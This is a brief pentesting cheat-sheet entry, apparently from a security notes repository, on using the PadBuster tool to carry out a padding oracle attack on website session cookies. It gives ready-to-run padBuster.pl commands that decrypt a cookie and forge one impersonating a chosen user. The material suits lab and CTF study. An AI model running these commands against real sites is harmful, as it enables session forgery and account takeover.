killchain-compendium/exploit/padding/padbuster.md

17 lines
622 B
Markdown
Raw Normal View History

2022-03-19 23:39:17 +01:00
# PadBuster
* [AeonCyberLabs' github](https://github.com/AonCyberLabs/PadBuster.git)
* Padding Oracle
## Usage on Cookies
* Oracle on cookievalue, use website error message of invalid padding
* A high privileged user account can be added as a target
```sh
./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
```sh
./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
```